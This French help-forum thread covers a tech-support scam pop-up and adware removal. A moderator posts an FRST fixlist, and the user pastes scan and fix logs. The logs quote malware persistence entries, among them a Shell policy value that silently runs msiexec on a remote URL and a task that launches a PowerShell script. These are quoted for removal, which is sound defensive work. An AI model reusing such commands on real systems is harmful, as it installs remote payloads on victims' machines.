Votre ordinateur a été bloqué sur page alerte de virus
Résolu/Fermé
bbeignon
-
Modifié le 9 mai 2017 à 22:24
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 15 mai 2017 à 16:23
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 15 mai 2017 à 16:23
A voir également:
- Firefox bloqué par un virus
- Uptobox bloqué - Guide
- Code puk bloqué - Guide
- Comment savoir si on est bloqué sur messenger - Guide
- Pavé tactile bloqué - Guide
- Compte gmail bloqué - Guide
4 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
9 mai 2017 à 22:05
9 mai 2017 à 22:05
Salut,
Il s'agit d'un message d'arnaque de support téléphonique qui vise à te faire croire que ton PC est infecté pour te faire appeler un support téléphonique....
Le but de ce support est de te conforter dans le fait que ton ordinateur est infecté, pour va te faire acheter des logiciels à des prix élevés, souvent au final 200 euros.
Ces messages cherchant à bloquer le navigateur WEB et indiquant que le PC est infecté viennent de publicités sur des sites de streaming/torrent illégaux.
Cela peut aussi aller par des campagnes téléphoniques, où tu reçois un appel par un technicien se faisant passer pour Microsoft.
Ton ordinateur n'est pas infecté.
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
Il s'agit d'un message d'arnaque de support téléphonique qui vise à te faire croire que ton PC est infecté pour te faire appeler un support téléphonique....
Le but de ce support est de te conforter dans le fait que ton ordinateur est infecté, pour va te faire acheter des logiciels à des prix élevés, souvent au final 200 euros.
Ces messages cherchant à bloquer le navigateur WEB et indiquant que le PC est infecté viennent de publicités sur des sites de streaming/torrent illégaux.
Cela peut aussi aller par des campagnes téléphoniques, où tu reçois un appel par un technicien se faisant passer pour Microsoft.
Ton ordinateur n'est pas infecté.
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
9 mai 2017 à 23:51
9 mai 2017 à 23:51
Si ça peut te rassurer, on peut vérifier l'ordinateur :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
>
Brice
10 mai 2017 à 00:08
10 mai 2017 à 00:08
fais une analyse Malwarebytes sur Mac : https://fr.malwarebytes.com/mac/
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
>
Brice
10 mai 2017 à 00:12
10 mai 2017 à 00:12
donc tout va bien :)
vois si ça recommence.
vois si ça recommence.
ELpp12
Messages postés
3
Date d'inscription
vendredi 12 mai 2017
Statut
Membre
Dernière intervention
15 mai 2017
Modifié le 12 mai 2017 à 18:40
Modifié le 12 mai 2017 à 18:40
Bonjour
Ayant pas mal de problème avec mon ordi et notamment
hxx://www.ourluckysites.com/?type=sc&ts=1493795129&z=f93a22eb370f4c8cd34562dg0z7t5c6mdt5wcg8o6b&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WX51E93YD847YD847
au lancement d'internet ainsi que des demande d'appel car mon ordi est infecte j'ai fait comme vous le demandez. Merci par avance pour votre aide.
cordialement.
Pierre
https://pjjoint.malekal.com/files.php?id=20170512_n7s7g10w7x9
https://pjjoint.malekal.com/files.php?id=FRST_20170512_b12o11u5y5c14
https://pjjoint.malekal.com/files.php?id=20170512_s8o7b13g8v13
Ayant pas mal de problème avec mon ordi et notamment
hxx://www.ourluckysites.com/?type=sc&ts=1493795129&z=f93a22eb370f4c8cd34562dg0z7t5c6mdt5wcg8o6b&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WX51E93YD847YD847
au lancement d'internet ainsi que des demande d'appel car mon ordi est infecte j'ai fait comme vous le demandez. Merci par avance pour votre aide.
cordialement.
Pierre
https://pjjoint.malekal.com/files.php?id=20170512_n7s7g10w7x9
https://pjjoint.malekal.com/files.php?id=FRST_20170512_b12o11u5y5c14
https://pjjoint.malekal.com/files.php?id=20170512_s8o7b13g8v13
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
Modifié le 12 mai 2017 à 18:46
Modifié le 12 mai 2017 à 18:46
Hello ELpp12,
Désinstalle YAC(Yet Another Cleaner!)
puis :
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Veuillez appuyer sur une touche pour continuer la désinfection...
Désinstalle YAC(Yet Another Cleaner!)
puis :
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-2704358713-113574765-3970069142-1001\...\Run: [background_fault] => C:\Users\utilisateur\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== ATTENTION
HKU\S-1-5-21-2704358713-113574765-3970069142-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj85OTJYFTU5MjIdF8JQMWlXNjlLMdzSFTw4FTU4MkU1Nc%3D%3D /q [Pays US - 104.24.101.133]
R2 SNARE; C:\Users\utilisateur\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [Fichier non signé] <==== ATTENTION
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda)
S4 Kitty; C:\Users\utilisateur\AppData\Local\Kitty\Kitty.dll [124928 2017-05-09] () [Fichier non signé] <==== ATTENTION
2 WinInstallSvc; C:\ProgramData\Microsoft\AppV\Setup\Integrator.dll [105984 2017-05-08] () [Fichier non signé]
R2 WinSAPSvc; C:\Users\utilisateur\AppData\Roaming\WinSAPSvc\WinSAP.dll [585216 2017-05-09] (serviec) [Fichier non signé] <==== ATTENTION
S3 WsAppService; C:\Program Files (x86)\Wondershare\WAF\WsAppService.exe [252816 2015-04-30] (Wondershare)
R2 SNAREA; C:\Users\utilisateur\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [Fichier non signé] <==== ATTENTION
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
R2 WANARE; C:\Users\utilisateur\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [Fichier non signé]
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
S3 iSafeKrnlBoot; C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeNetFilter; C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== ATTENTION
S3 mvdM23; C:\Users\utilisateur\AppData\Local\Temp\mvdM23.sys [100912 2017-04-07] () <==== ATTENTION
C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys 5E07045CEAE146804475434227649883
C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys FAB2EBA07369BF3C6DB33469B5B36FCB
C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys 406D4425ECFD7BAAFA0E700F7A2E64FD
C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys A22E4FC5E5A801DAAE7978F87059CC9F
C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys C7129E801982BC831831D2F6DD6FCE8B
C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys 9FB02FBA90F6AF59537A30C3DB9777C8
2017-05-11 13:45 - 2017-05-12 15:01 - 00002066 _____ C:\Users\utilisateur\Desktop\big_bang_empire.lnk
2017-05-11 13:45 - 2017-05-12 15:01 - 00002040 _____ C:\Users\utilisateur\Desktop\BigFarm.lnk
2017-05-11 10:33 - 2017-05-11 13:20 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333
2017-05-11 10:33 - 2017-05-11 10:33 - 00000000 ____D C:\WINDOWS\system32\log
2017-05-11 10:33 - 2017-05-11 10:33 - 00000000 ____D C:\Program Files (x86)\Elex-tech
2017-05-11 10:33 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys
2017-05-11 10:33 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys
2017-05-11 10:32 - 2017-05-11 13:44 - 00000000 ____D C:\Users\utilisateur\AppData\Local\NPASRE
2017-05-11 10:32 - 2017-05-11 13:20 - 00000000 _____ C:\WINDOWS\SysWOW64\00
2017-05-11 10:32 - 2017-05-11 10:32 - 00002003 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-05-11 10:32 - 2017-05-11 10:32 - 00000000 ____D C:\Users\utilisateur\AppData\Roaming\Elex-tech
2017-05-09 12:42 - 2017-05-12 15:01 - 00000000 ____D C:\Program Files\MK
2017-05-09 12:42 - 2017-05-12 15:01 - 00000000 _____ C:\WINDOWS\SysWOW64\1111
2017-05-09 10:45 - 2017-05-09 10:47 - 00000000 ____D C:\Users\Public\Documents\temp
2017-05-09 10:45 - 2017-05-09 10:45 - 00000000 ____D C:\Users\Public\Documents\Google
2017-05-09 10:45 - 2017-05-09 10:45 - 00000000 ____D C:\Users\Public\Documents\chrome
2017-05-09 10:45 - 2017-05-09 10:45 - 00000000 ____D C:\Program Files (x86)\Bookness
2017-05-08 11:46 - 2017-05-08 11:47 - 00000000 ____D C:\Users\utilisateur\Desktop\8 mais 2017
2017-05-05 12:19 - 2017-05-05 12:19 - 00000000 ____D C:\Users\utilisateur\AppData\Local\WANARE
2017-05-05 12:19 - 2017-05-05 12:19 - 00000000 ____D C:\ProgramData\BIT
2017-05-04 10:59 - 2017-05-12 09:06 - 00000000 ____D C:\Users\utilisateur\AppData\Local\background_fault
2017-05-04 10:59 - 2017-05-09 12:45 - 00000000 ____D C:\Program Files (x86)\AlphaGo
2017-05-04 09:14 - 2017-05-12 09:51 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-05-03 14:15 - 2017-05-11 13:20 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
2017-05-03 14:15 - 2017-05-05 12:20 - 00003578 _____ C:\WINDOWS\System32\Tasks\Windows-PG
2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 ____D C:\WINDOWS\psgo
2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 ____D C:\Users\utilisateur\AppData\Local\SNAREA
2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 ____D C:\Users\utilisateur\AppData\Local\Kitty
2017-05-03 09:05 - 2017-05-12 15:01 - 00003666 _____ C:\WINDOWS\System32\Tasks\Milimili
2017-05-03 09:05 - 2017-05-12 15:01 - 00000000 ____D C:\Users\utilisateur\AppData\Roaming\WinSAPSvc
2017-05-03 09:05 - 2017-05-03 09:05 - 00000376 _____ C:\WINDOWS\SysWOW64\data.bin
2017-05-03 09:05 - 2017-05-03 09:05 - 00000000 ____D C:\Users\utilisateur\AppData\Local\SNARE
2017-05-03 09:05 - 2017-05-03 09:05 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 ____D C:\Users\utilisateur\AppData\Roaming\Firefox
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 ____D C:\Users\utilisateur\AppData\Local\Firefox
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 ____D C:\Users\utilisateur\AppData\Local\Doeye
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 ____D C:\ProgramData\Apple
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 ____D C:\Program Files (x86)\Doeye
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 _____ C:\WINDOWS\SysWOW64\33
2017-04-26 09:17 - 2017-05-12 16:15 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-26 09:17 - 2017-05-12 15:01 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-26 09:17 - 2017-05-11 13:20 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-04-26 09:17 - 2017-04-26 09:18 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-04-26 09:13 - 2017-05-11 13:19 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-04-14 09:11 - 2017-04-14 11:03 - 00000000 ____D C:\Users\utilisateur\Desktop\SMAH
2017-04-13 15:15 - 2017-04-13 15:15 - 00000000 ____D C:\Users\utilisateur\AppData\Roaming\SSMgre
Task: {416E13CC-6EFB-4784-92EC-7698F01AFE44} - System32\Tasks\{A31D07D8-792D-4A70-AA88-0B3A5F6F23E6} => pcalua.exe -a C:\Users\utilisateur\AppData\Roaming\mystartsearch\UninstallManager.exe -c -ptid=slbnew
Task: {C035B091-00AF-4FCD-99EB-52A74E569DC2} - System32\Tasks\{518A85B1-3201-4D19-AE4A-C0E8D47B9811} => pcalua.exe -a C:\Users\utilisateur\AppData\Local\{ACCF9A93-8867-F62B-E5FF-D3C3C1972F5B}\uninst.exe -c -FN="C:\Users\utilisateur\AppData\Local\{AC929A29-89C0-F75F-E2F6-D08D3E242DB3}\SyncTask.exe"-P=/Uninstall /s /noun /DelSelfDir
Task: {C645F8A1-45D3-4EE3-9458-FBC53F0CA902} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
C:\windows\psgo
Shortcut: C:\Users\utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.)
ShortcutWithArgument: C:\Users\utilisateur\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\utilisateur\Desktop\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005
ShortcutWithArgument: C:\Users\utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493795129&z=f93a22eb370f4c8cd34562dg0z7t5c6mdt5wcg8o6b&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WX51E93YD847YD847
ShortcutWithArgument: C:\Users\utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493795129&z=f93a22eb370f4c8cd34562dg0z7t5c6mdt5wcg8o6b&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WX51E93YD847YD847
ShortcutWithArgument: C:\Users\utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493795129&z=f93a22eb370f4c8cd34562dg0z7t5c6mdt5wcg8o6b&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WX51E93YD847YD847
C:\Program Files (x86)\Doeye
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Veuillez appuyer sur une touche pour continuer la désinfection...
Farbar Recovery Scan Tool (x64) Version: 14-05-2017
Exécuté par utilisateur (15-05-2017 10:11:03)
Exécuté depuis C:\Users\utilisateur\Downloads
Mode d'amorçage: Normal
================== Chercher Fichiers: "fixlist.txt" =============
C:\Users\utilisateur\Desktop\fixlist.txt
[2017-05-15 09:46][2017-05-15 09:46] 0009968 _____ () 32BB24F0CCD7CEC3B9377492BF506BBC [Fichier non signé]
ci-joint le texte apres la recherche
merci de votre aide
cordialement
pierre
Exécuté par utilisateur (15-05-2017 10:11:03)
Exécuté depuis C:\Users\utilisateur\Downloads
Mode d'amorçage: Normal
================== Chercher Fichiers: "fixlist.txt" =============
C:\Users\utilisateur\Desktop\fixlist.txt
[2017-05-15 09:46][2017-05-15 09:46] 0009968 _____ () 32BB24F0CCD7CEC3B9377492BF506BBC [Fichier non signé]
Fin de Chercher
bonjourci-joint le texte apres la recherche
merci de votre aide
cordialement
pierre
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
>
Elpp12
15 mai 2017 à 10:49
15 mai 2017 à 10:49
La procédure n'a pas été suivi correctement.
ELpp12
Messages postés
3
Date d'inscription
vendredi 12 mai 2017
Statut
Membre
Dernière intervention
15 mai 2017
15 mai 2017 à 16:16
15 mai 2017 à 16:16
bonjour
oui en effet je n'avais pas faite la bonne procedure. Je n'ai pas relever le texte à la fin car j'ai dit ok et ca a rebooster mon ordi. A priori tout remarche bien si je vois des erreur je reviendrais
en te remerciant par avance et surtout pour le coup de main
cordialement
Pierre
oui en effet je n'avais pas faite la bonne procedure. Je n'ai pas relever le texte à la fin car j'ai dit ok et ca a rebooster mon ordi. A priori tout remarche bien si je vois des erreur je reviendrais
en te remerciant par avance et surtout pour le coup de main
cordialement
Pierre
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
>
ELpp12
Messages postés
3
Date d'inscription
vendredi 12 mai 2017
Statut
Membre
Dernière intervention
15 mai 2017
15 mai 2017 à 16:23
15 mai 2017 à 16:23
Pas de soucis =)
ELpp12
Messages postés
3
Date d'inscription
vendredi 12 mai 2017
Statut
Membre
Dernière intervention
15 mai 2017
15 mai 2017 à 16:18
15 mai 2017 à 16:18
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 14-05-2017
Exécuté par utilisateur (15-05-2017 11:58:40) Run:1
Exécuté depuis C:\Users\utilisateur\Desktop
Profils chargés: utilisateur (Profils disponibles: utilisateur)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-2704358713-113574765-3970069142-1001\...\Run: [background_fault] => C:\Users\utilisateur\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== ATTENTION
HKU\S-1-5-21-2704358713-113574765-3970069142-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj85OTJYFTU5MjIdF8JQMWlXNjlLMdzSFTw4FTU4MkU1Nc%3D%3D /q [Pays US - 104.24.101.133]
R2 SNARE; C:\Users\utilisateur\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [Fichier non sign�] <==== ATTENTION
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participa��es Ltda)
S4 Kitty; C:\Users\utilisateur\AppData\Local\Kitty\Kitty.dll [124928 2017-05-09] () [Fichier non sign�] <==== ATTENTION
2 WinInstallSvc; C:\ProgramData\Microsoft\AppV\Setup\Integrator.dll [105984 2017-05-08] () [Fichier non sign�]
R2 WinSAPSvc; C:\Users\utilisateur\AppData\Roaming\WinSAPSvc\WinSAP.dll [585216 2017-05-09] (serviec) [Fichier non sign�] <==== ATTENTION
S3 WsAppService; C:\Program Files (x86)\Wondershare\WAF\WsAppService.exe [252816 2015-04-30] (Wondershare)
R2 SNAREA; C:\Users\utilisateur\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [Fichier non sign�] <==== ATTENTION
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
R2 WANARE; C:\Users\utilisateur\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [Fichier non sign�]
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
S3 iSafeKrnlBoot; C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
R1 iSafeNetFilter; C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
S3 mvdM23; C:\Users\utilisateur\AppData\Local\Temp\mvdM23.sys [100912 2017-04-07] () <==== ATTENTION
C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys 5E07045CEAE146804475434227649883
C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys FAB2EBA07369BF3C6DB33469B5B36FCB
C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys 406D4425ECFD7BAAFA0E700F7A2E64FD
C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys A22E4FC5E5A801DAAE7978F87059CC9F
C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys C7129E801982BC831831D2F6DD6FCE8B
C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys 9FB02FBA90F6AF59537A30C3DB9777C8
2017-05-11 13:45 - 2017-05-12 15:01 - 00002066 _____ C:\Users\utilisateur\Desktop\big_bang_empire.lnk
2017-05-11 13:45 - 2017-05-12 15:01 - 00002040 _____ C:\Users\utilisateur\Desktop\BigFarm.lnk
2017-05-11 10:33 - 2017-05-11 13:20 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333
2017-05-11 10:33 - 2017-05-11 10:33 - 00000000 ____D C:\WINDOWS\system32\log
2017-05-11 10:33 - 2017-05-11 10:33 - 00000000 ____D C:\Program Files (x86)\Elex-tech
2017-05-11 10:33 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participa��es Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys
2017-05-11 10:33 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participa��es Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys
2017-05-11 10:32 - 2017-05-11 13:44 - 00000000 ____D C:\Users\utilisateur\AppData\Local\NPASRE
2017-05-11 10:32 - 2017-05-11 13:20 - 00000000 _____ C:\WINDOWS\SysWOW64\00
2017-05-11 10:32 - 2017-05-11 10:32 - 00002003 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-05-11 10:32 - 2017-05-11 10:32 - 00000000 ____D C:\Users\utilisateur\AppData\Roaming\Elex-tech
2017-05-09 12:42 - 2017-05-12 15:01 - 00000000 ____D C:\Program Files\MK
2017-05-09 12:42 - 2017-05-12 15:01 - 00000000 _____ C:\WINDOWS\SysWOW64\1111
2017-05-09 10:45 - 2017-05-09 10:47 - 00000000 ____D C:\Users\Public\Documents\temp
2017-05-09 10:45 - 2017-05-09 10:45 - 00000000 ____D C:\Users\Public\Documents\Google
2017-05-09 10:45 - 2017-05-09 10:45 - 00000000 ____D C:\Users\Public\Documents\chrome
2017-05-09 10:45 - 2017-05-09 10:45 - 00000000 ____D C:\Program Files (x86)\Bookness
2017-05-08 11:46 - 2017-05-08 11:47 - 00000000 ____D C:\Users\utilisateur\Desktop\8 mais 2017
2017-05-05 12:19 - 2017-05-05 12:19 - 00000000 ____D C:\Users\utilisateur\AppData\Local\WANARE
2017-05-05 12:19 - 2017-05-05 12:19 - 00000000 ____D C:\ProgramData\BIT
2017-05-04 10:59 - 2017-05-12 09:06 - 00000000 ____D C:\Users\utilisateur\AppData\Local\background_fault
2017-05-04 10:59 - 2017-05-09 12:45 - 00000000 ____D C:\Program Files (x86)\AlphaGo
2017-05-04 09:14 - 2017-05-12 09:51 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-05-03 14:15 - 2017-05-11 13:20 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
2017-05-03 14:15 - 2017-05-05 12:20 - 00003578 _____ C:\WINDOWS\System32\Tasks\Windows-PG
2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 ____D C:\WINDOWS\psgo
2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 ____D C:\Users\utilisateur\AppData\Local\SNAREA
2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 ____D C:\Users\utilisateur\AppData\Local\Kitty
2017-05-03 09:05 - 2017-05-12 15:01 - 00003666 _____ C:\WINDOWS\System32\Tasks\Milimili
2017-05-03 09:05 - 2017-05-12 15:01 - 00000000 ____D C:\Users\utilisateur\AppData\Roaming\WinSAPSvc
2017-05-03 09:05 - 2017-05-03 09:05 - 00000376 _____ C:\WINDOWS\SysWOW64\data.bin
2017-05-03 09:05 - 2017-05-03 09:05 - 00000000 ____D C:\Users\utilisateur\AppData\Local\SNARE
2017-05-03 09:05 - 2017-05-03 09:05 - 00000000 ____D C:\Program Files (x86)\MIO
